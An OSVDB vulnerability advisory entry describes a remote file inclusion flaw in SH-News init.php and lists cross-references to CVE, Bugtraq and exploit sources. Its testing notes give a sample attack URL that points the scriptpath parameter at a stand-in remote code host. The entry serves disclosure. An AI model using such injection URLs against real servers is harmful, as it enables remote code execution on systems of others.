SH-News init.php scriptpath Variable Remote File Inclusion

2006-10-11T04:34:00
ID OSVDB:29677
Type osvdb
Reporter OSVDB
Modified 2006-10-11T04:34:00

Description

Manual Testing Notes

http://[target]/path/init.php?scriptpath=http://EvElCoDe.txt?

References:

Vendor URL: http://www.shnews.de/ Secunia Advisory ID:22316 Related OSVDB ID: 29674 Related OSVDB ID: 29675 Related OSVDB ID: 29676 Related OSVDB ID: 29678 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-06/0189.html ISS X-Force ID: 29477 Generic Exploit URL: http://www.milw0rm.com/exploits/2518 FrSIRT Advisory: ADV-2006-4014 CVE-2006-5282 Bugtraq ID: 20478